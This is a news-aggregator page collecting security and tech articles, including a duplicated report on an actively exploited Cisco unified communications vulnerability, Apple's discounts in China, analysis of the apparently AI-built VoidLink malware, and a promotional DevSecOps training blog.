Cisco has released patches for a critical remote code execution vulnerability in its unified communications products that attackers are actively exploiting. The US Cybersecurity and Infrastructure Security Agency has added the flaw to its Known Exploited Vulnerabilities catalog, confirming the exploitation.
Cisco disclosed CVE-2026-20045 along with patches for Unified Communications Manager, Unity Connection, and Webex Calling Dedicated Instance. The company assigned the vulnerability a “Critical” severity rating despite its CVSS score of 8.2.
“Cisco has assigned this security advisory a Security Impact Rating (SIR) of Critical rather than High as the score indicates,” the company said in its advisory. “The reason is that exploitation of this vulnerability could result in an attacker elevating privileges to root.”
CISA’s addition of the vulnerability to its KEV catalog confirms attackers are exploiting it in the wild. “This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise,” CISA said in its alert.
This is the second actively exploited Cisco vulnerability CISA has added to its KEV catalog in recent weeks. Last week, the agency added CVE-2025-20393, affecting Cisco’s AsyncOS software.
“Other collaboration products, including Contact Center Enterprise, Emergency Responder, Finesse, Unified Intelligence Center, and Unified Contact Center Express, are not vulnerable to CVE-2026-20045,” the advisory added.
Root-level compromise with no user interaction
The vulnerability stems from improper validation of user-supplied input in HTTP requests. “An attacker could exploit this vulnerability by sending a sequence of crafted HTTP requests to the web-based management interface of an affected device,” Cisco explained in the advisory. “A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root.”
The attack requires no user interaction and can be carried out by unauthenticated remote attackers, making it particularly dangerous for internet-facing unified communications deployments, the advisory added.
Cisco’s Product Security Incident Response Team added that it is “aware of attempted exploitation of this vulnerability in the wild,” underscoring the urgency of patching.
No workarounds available
Cisco confirmed in the advisory that there are no workarounds or mitigations available for CVE-2026-20045. The company has released fixes specific to each product version.
For Unified Communications Manager, IM&P, SME, and Webex Calling Dedicated Instance running version 14, the company suggested administrators can upgrade to version 14SU5 or apply a version-specific patch file. Organizations running version 15 can apply version-specific patches for 15SU2 and 15SU3a, with a full release of version 15SU4 expected in March 2026, the company added.
Unity Connection administrators have similar options, with version-specific patch files available for releases 14SU4 and 15SU3.
Organizations still running version 12.5 face a harder choice: Cisco won’t release patches for this version and recommends migrating to a supported release.
“Customers are advised to migrate to a supported release that includes the fix for this vulnerability,” Cisco said in the advisory. Patches are version-specific, and administrators should consult the README files attached to each patch for deployment details, the advisory added.
Federal agencies face a deadline
CISA’s inclusion of CVE-2026-20045 in the KEV catalog triggers mandatory remediation timelines for Federal Civilian Executive Branch agencies under Binding Operational Directive 22-01. Federal agencies must patch the vulnerability within two weeks of its January 21 addition to the catalog.
While BOD 22-01 applies specifically to federal agencies, CISA “strongly recommends” that all organizations treat KEV-listed vulnerabilities as high-priority patching targets. The catalog tracks flaws with confirmed active exploitation, making them significantly more likely to be weaponized against a broader range of targets.
How to patch
Cisco said organizations should check for signs of potential compromise on all internet-accessible instances after applying mitigations. The company advised administrators to review system logs and configurations for any unauthorized changes or suspicious activity that may indicate prior exploitation.
For organizations unable to immediately upgrade to fixed releases, the company said version-specific patch files offer an interim remediation option. However, Cisco noted that patches must match the exact software version running on the device, and administrators should verify compatibility before deployment.
View the full article
CSOonline

Actively exploited Cisco UC bug requires immediate, version‑specific patching

Cisco has released patches for a critical remote code execution vulnerability in its unified communications products that attackers are actively exploiting. The US Cybersecurity and Infrastructure Security Agency has added the flaw to its Known Exploited Vulnerabilities catalog, confirming the exploitation.
Cisco disclosed CVE-2026-20045 along with patches for Unified Communications Manager, Unity Connection, and Webex Calling Dedicated Instance. The company assigned the vulnerability a “Critical” severity rating despite its CVSS score of 8.2.
[ Related: More Cisco news and insights ]
“Cisco has assigned this security advisory a Security Impact Rating (SIR) of Critical rather than High as the score indicates,” the company said in its advisory. “The reason is that exploitation of this vulnerability could result in an attacker elevating privileges to root.”
CISA’s addition of the vulnerability to its KEV catalog confirms attackers are exploiting it in the wild. “This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise,” CISA said in its alert.
This is the second actively exploited Cisco vulnerability CISA has added to its KEV catalog in recent weeks. Last week, the agency added CVE-2025-20393, affecting Cisco’s AsyncOS software.
“Other collaboration products, including Contact Center Enterprise, Emergency Responder, Finesse, Unified Intelligence Center, and Unified Contact Center Express, are not vulnerable to CVE-2026-20045,” the advisory added.
Root-level compromise with no user interaction
The vulnerability stems from improper validation of user-supplied input in HTTP requests. “An attacker could exploit this vulnerability by sending a sequence of crafted HTTP requests to the web-based management interface of an affected device,” Cisco explained in the advisory. “A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root.”
The attack requires no user interaction and can be carried out by unauthenticated remote attackers, making it particularly dangerous for internet-facing unified communications deployments, the advisory added.
Cisco’s Product Security Incident Response Team added that it is “aware of attempted exploitation of this vulnerability in the wild,” underscoring the urgency of patching.
No workarounds available
Cisco confirmed in the advisory that there are no workarounds or mitigations available for CVE-2026-20045. The company has released fixes specific to each product version.
For Unified Communications Manager, IM&P, SME, and Webex Calling Dedicated Instance running version 14, the company suggested administrators can upgrade to version 14SU5 or apply a version-specific patch file. Organizations running version 15 can apply version-specific patches for 15SU2 and 15SU3a, with a full release of version 15SU4 expected in March 2026, the company added.
Unity Connection administrators have similar options, with version-specific patch files available for releases 14SU4 and 15SU3.
Organizations still running version 12.5 face a harder choice: Cisco won’t release patches for this version and recommends migrating to a supported release.
“Customers are advised to migrate to a supported release that includes the fix for this vulnerability,” Cisco said in the advisory. Patches are version-specific, and administrators should consult the README files attached to each patch for deployment details, the advisory added.
Federal agencies face a deadline
CISA’s inclusion of CVE-2026-20045 in the KEV catalog triggers mandatory remediation timelines for Federal Civilian Executive Branch agencies under Binding Operational Directive 22-01. Federal agencies must patch the vulnerability within two weeks of its January 21 addition to the catalog.
While BOD 22-01 applies specifically to federal agencies, CISA “strongly recommends” that all organizations treat KEV-listed vulnerabilities as high-priority patching targets. The catalog tracks flaws with confirmed active exploitation, making them significantly more likely to be weaponized against a broader range of targets.
How to patch
Cisco said organizations should check for signs of potential compromise on all internet-accessible instances after applying mitigations. The company advised administrators to review system logs and configurations for any unauthorized changes or suspicious activity that may indicate prior exploitation.
For organizations unable to immediately upgrade to fixed releases, the company said version-specific patch files offer an interim remediation option. However, Cisco noted that patches must match the exact software version running on the device, and administrators should verify compatibility before deployment.
More Cisco news:
Cisco’s 2026 agenda prioritizes AI-ready infrastructure, connectivity Cisco finally patches seven-week-old zero-day flaw in Secure Email Gateway products Cisco routers knocked out due to Cloudflare DNS change Cisco identifies vulnerability in ISE network access control devices Attackers bring their own passwords to Cisco and Palo Alto VPNs Cisco confirms zero-day exploitation of Secure Email products Cisco defines AI security framework for enterprise protection Cisco initiative targets device security Key takeaways from Cisco Partner Summit AI networking demand fueled Cisco’s upbeat Q1 financial Cisco launches AI infrastructure, AI practitioner certifications View the full article
CSOonline

Apple Responds to Slowing China Sales With Lunar New Year Discounts

Apple is offering discounts of up to 1,000 yuan ($144) on some products in China in anticipation of a holiday shopping rush and competitive pricing from local vendors, reports the South China Morning Post.


Ahead of February's Lunar New Year, Apple's mainland China website and official stores are offering limited-time discounts on products including the iPhone 16 and iPhone 16 Plus, as well as some MacBook, iPad, Apple Watch, and AirPods models. The discounts come into effect between January 24 and January 27.

Apple led the Chinese smartphone market in the fourth quarter of 2025 with a 22 percent share, thanks to strong iPhone 17 sales. Despite the demand, sales are said to have been falling month on month, and the promotions are aimed at countering the decline.

China's smartphone market shrank 1.6 percent year on year in Q4 2025, while full-year shipments declined 0.6 percent. Counterpoint analysts have put the decline down to weak demand amid rising prices and global memory shortages.

Chinese government policies appear to have played a role too. Under government subsidies, consumers of electronics get a 15% refund of products that are priced under 6,000 yuan ($820). Apple partly missed out on the program, since its iPhone Pro models exceed the price cutoff, giving its local rivals an edge.Tag: China
This article, "Apple Responds to Slowing China Sales With Lunar New Year Discounts" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
reporter

VoidLink malware was almost entirely made by AI

VoidLink, the high-impact Linux malware framework disclosed last week, is back under scrutiny for claims that the bulk of its development was done by artificial intelligence (AI).
According to the follow-up analysis from Check Point Research (CPR), which first disclosed VoidLink, the malware was not merely assisted by AI tooling but was largely planned, structured, and written through AI-driven processes.
“CPR believes a new era of AI-generated malware has begun,” the researchers said in a blog post. “VoidLink stands as the first evidently documented case of this era, as a truly advanced malware framework authored almost entirely by AI, like under the direction of a single individual.”
VoidLink was initially disclosed as a modular Linux malware framework capable of operating across cloud and containerized environments. The latest claims of AI acting as its primary author compresses months of engineering work into a matter of days, the researchers noted.
While no active large-scale exploitation tied to VoidLink has yet been reported, the prospect of a much lower barrier to producing complex malware at speed could be concerning for defenders.
Evidence points to AI-led development
Check Point researchers traced VoidLink’s origins to late 2025, when early development samples began appearing in telemetry. What stood out was not just the malware’s modular design, but the presence of structured development documentation typically associated with organized software projects.
The researchers identified sprint-style plans, detailed technical specifications, and task breakdowns that appeared to be generated programmatically rather than authored manually. Code comments, architectural consistency, and repetitive implementation patterns further suggested that an AI system was responsible for producing large portions of the framework.
Additionally, as per Check Point’s analysis, VoidLink grew to tens of thousands of lines of code in under a week, a pace that would be difficult for even a skilled development team to sustain. While a human operator likely guided the process, AI handled much of the execution, generating code, refining modules, and accelerating iteration cycles.
Unlike previous examples of AI-assisted malware, which often relied on basic scripts and reused open-sourced components, AI appears to have driven end-to-end development of VoidLink.
What VoidLink signals for enterprise security
Check Point’s analysis frames the malware as an important indicator of how threat development itself is changing. The researchers emphasize that the significance of VoidLink lies less in its current deployment and more in how quickly it was created using AI-driven processes.
VoidLink is designed to operate on Linux systems commonly found in servers, cloud workloads, and containerized environments. Its modular structure allows components to be developed, replaced, or extended independently, a design choice that aligns with long-term development rather than a single-use attack. According to the researchers, this approach reflects a level of planning typically associated with well-resourced threat actors.
It was also emphasized that AI-assisted development significantly reduced the time and effort required to produce a complex malware framework like VoidLink. What would normally require coordinated teams and extended development cycles was condensed into a rapid, largely automated process.
This lowers the barrier to creating sophisticated malware and may enable smaller or less experienced actors to build tools previously out of reach, the researchers argued. While mitigation efforts around VoidLink continue to focus on hardening Linux and cloud environments, improving runtime visibility, and detecting suspicious or unknown binaries, Check Point cautioned that the broader risk extends beyond this single framework.
The development techniques observed in VoidLink, particularly extensive use of AI to plan and generate malware components, could be easily replicated, potentially shortening development cycles of future threats.
View the full article
CSOonline

Filling the Most Common Gaps in Google Workspace Security

Security teams at agile, fast-growing companies often have the same mandate: secure the business without slowing it down. Most teams inherit a tech stack optimized for breakneck growth, not resilience. In these environments, the security team is the helpdesk, the compliance expert, and the incident response team all rolled into one. Securing the cloud office in this scenario is all aboutView the full article
Hacker News

A Comprehensive Guide to Enterprise DevSecOps Coaching Programs

Introduction: Problem, Context & Outcome
Software teams deliver features faster than ever, yet security still struggles to keep pace. Many engineers focus on speed first and push security checks to the end of the release cycle. Consequently, vulnerabilities appear late, fixing them becomes expensive, and deployment confidence drops. Meanwhile, organizations continue adopting cloud platforms, CI/CD pipelines, and Agile development at scale. This evolution increases attack surfaces and compliance pressure at the same time. Teams now need security embedded directly into DevOps workflows rather than handled separately. DevSecOps Trainers solve this challenge by teaching teams how to integrate security into every phase of delivery. In this blog, you will discover what DevSecOps Trainers do, why they play a critical role today, and how their guidance helps teams deliver secure software without slowing down innovation.
Why this matters: Early security integration protects systems while maintaining delivery speed.
What Is DevSecOps Trainers?
DevSecOps Trainers are seasoned professionals who teach teams how to embed security into DevOps practices from day one. Instead of treating security as a final audit, they show how it becomes a shared responsibility across development, operations, and security teams. These trainers guide developers on secure coding habits, help DevOps engineers protect CI/CD pipelines, and support QA teams in validating security controls continuously. DevSecOps Trainers also focus on cloud security, infrastructure protection, and automated compliance. In real organizations, they work with startups, enterprises, and regulated industries to reduce risk without disrupting delivery. Their approach blends culture, process, and automation rather than relying on manual approvals or isolated security tools.
Why this matters: A clear DevSecOps approach turns security into a delivery strength, not a bottleneck.
Why DevSecOps Trainers Is Important in Modern DevOps & Software Delivery
Modern software delivery demands rapid innovation while maintaining trust and resilience. At the same time, cyber threats continue to grow in complexity and frequency. DevSecOps Trainers help organizations manage this balance. They address challenges like late vulnerability detection, manual security gates, and inconsistent compliance practices. Furthermore, they align security with CI/CD pipelines, cloud infrastructure, Agile planning, and DevOps collaboration. Without structured training, teams often bolt security onto pipelines in ineffective ways. With expert trainers, teams integrate automated security checks early and consistently. As organizations scale cloud-native and microservices architectures, DevSecOps Trainers become essential for building secure and reliable delivery systems.
Why this matters: Proactive security enables fast delivery without compromising trust.
Core Concepts & Key Components
Shift-Left Security
Purpose: Identify and resolve security issues early.
How it works: Trainers integrate security checks into coding and build stages.
Where it is used: Source code repositories and CI pipelines.
Secure CI/CD Pipelines
Purpose: Protect the delivery pipeline itself.
How it works: Trainers teach secrets management, access control, and pipeline hardening.
Where it is used: Jenkins, GitLab CI, GitHub Actions, cloud CI tools.
Cloud and Infrastructure Security
Purpose: Secure underlying infrastructure and configurations.
How it works: Trainers enforce policies and secure defaults automatically.
Where it is used: AWS, Azure, Google Cloud platforms.
Continuous Compliance
Purpose: Maintain regulatory and policy alignment.
How it works: Trainers automate compliance checks and generate audit-ready reports.
Where it is used: Finance, healthcare, enterprise IT environments.
Runtime Monitoring and Threat Detection
Purpose: Detect risks in live systems.
How it works: Trainers implement logs, alerts, and runtime protection.
Where it is used: Production environments and SRE workflows.
Why this matters: These components reduce risk across the entire software lifecycle.
How DevSecOps Trainers Works (Step-by-Step Workflow)
DevSecOps Trainers follow a structured and practical workflow. First, they assess current delivery pipelines and security maturity. Next, they introduce DevSecOps principles using real operational examples instead of abstract theory. Then, they map security controls to each DevOps lifecycle stage. Teams learn how to add automated scans, manage secrets, and enforce policies. Trainers emphasize rapid feedback through alerts and reports. Finally, teams adopt continuous improvement by regularly reviewing threats and controls. This step-by-step approach keeps security practical and scalable.
Why this matters: A clear workflow makes security repeatable and manageable.
Real-World Use Cases & Scenarios
Financial organizations use DevSecOps Trainers to meet strict compliance requirements. SaaS companies rely on them to secure shared cloud platforms. E-commerce teams adopt DevSecOps to protect customer data and transactions. Developers focus on writing secure code. DevOps engineers harden pipelines and infrastructure. QA teams validate security early. SRE teams monitor runtime threats. Cloud teams enforce governance policies. Across industries, DevSecOps training reduces incidents while preserving fast release cycles.
Why this matters: Real-world use cases prove that security and speed can coexist.
Benefits of Using DevSecOps Trainers
Productivity: Teams avoid late-stage security rework Reliability: Secure systems reduce outages and incidents Scalability: Automated controls support growth Collaboration: Shared ownership builds trust across teams Why this matters: Tangible benefits justify sustained DevSecOps investment.
Challenges, Risks & Common Mistakes
Many teams approach DevSecOps as only a tooling exercise. Others overload pipelines with scans that slow delivery. Some teams ignore cultural change altogether. DevSecOps Trainers address these risks by focusing on fundamentals first, automation second, and culture throughout. They help teams prioritize risks realistically and avoid unnecessary complexity.
Why this matters: Awareness prevents burnout and ineffective security practices.
Comparison Table
AspectTraditional SecurityDevSecOpsSecurity TimingLate-stageContinuousResponsibilityCentralizedSharedAutomation LevelLowHighFeedback SpeedSlowFastComplianceManualAutomatedScalabilityLimitedHighCloud ReadinessPartialNativeCollaborationMinimalStrongRisk VisibilityLowHighDelivery SpeedSlowFast Why this matters: The comparison highlights why DevSecOps outperforms traditional security models.
Best Practices & Expert Recommendations
Effective DevSecOps Trainers start with education and awareness. They integrate security incrementally rather than all at once. They automate only what teams understand. They align security metrics with business outcomes. They also document processes clearly and maintain feedback loops. This balanced strategy ensures long-term success and adoption.
Why this matters: Best practices keep security sustainable and effective.
Who Should Learn or Use DevSecOps Trainers?
Developers build secure coding habits early. DevOps engineers protect pipelines and infrastructure. Cloud engineers enforce security policies. QA teams validate controls continuously. SRE teams manage runtime risks. Beginners gain structure, while experienced professionals optimize security at scale.
Why this matters: Broad adoption strengthens organizational security posture.
FAQs – People Also Ask
What are DevSecOps Trainers?
They teach how to integrate security into DevOps workflows.
Why this matters: Clear roles support faster adoption.
Is DevSecOps suitable for beginners?
Yes, trainers adjust learning paths based on experience.
Why this matters: Beginners learn safely and confidently.
Does DevSecOps slow down development?
No, automation speeds up secure delivery.
Why this matters: Speed remains competitive.
Is DevSecOps important for cloud environments?
Yes, cloud systems require continuous security.
Why this matters: Cloud risk increases without automation.
Do DevSecOps Trainers teach tools?
Yes, alongside core concepts.
Why this matters: Balance ensures understanding.
Is DevSecOps relevant for DevOps engineers?
Yes, it extends DevOps responsibilities.
Why this matters: Roles evolve continuously.
Does DevSecOps help with compliance?
Yes, through automated checks.
Why this matters: Compliance becomes manageable.
Can QA teams benefit from DevSecOps?
Yes, they validate security early.
Why this matters: Quality improves sooner.
Is DevSecOps expensive to implement?
No, prevention reduces long-term costs.
Why this matters: Risk reduction saves money.
Is DevSecOps future-proof?
Yes, demand continues to grow.
Why this matters: Skills remain relevant.
Branding & Authority
DevOpsSchool is a globally trusted education platform delivering enterprise-grade training in DevOps and security practices. Through structured programs, DevOpsSchool supports organizations and professionals searching for DevSecOps Trainers with hands-on learning, real-world scenarios, and scalable frameworks. Enterprises rely on this platform because it emphasizes execution, clarity, and measurable outcomes.
Why this matters: Trusted platforms ensure learning credibility and consistency.
Rajesh Kumar acts as a senior mentor with more than 20 years of hands-on industry experience. Through Rajesh Kumar, learners gain guidance across DevOps, DevSecOps, Site Reliability Engineering, DataOps, AIOps, MLOps, Kubernetes, cloud platforms, CI/CD pipelines, and automation. His mentorship bridges theory with enterprise execution.
Why this matters: Proven expertise accelerates real-world mastery.
Call to Action & Contact Information
Email: [email protected]
Phone & WhatsApp (India): +91 84094 92687
Phone & WhatsApp (USA): +1 (469) 756-6329
Explore secure, scalable DevSecOps training programs designed for modern enterprise delivery.




View the full article
reporter

Account

Navigation

Search

Search

Configure browser push notifications
Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.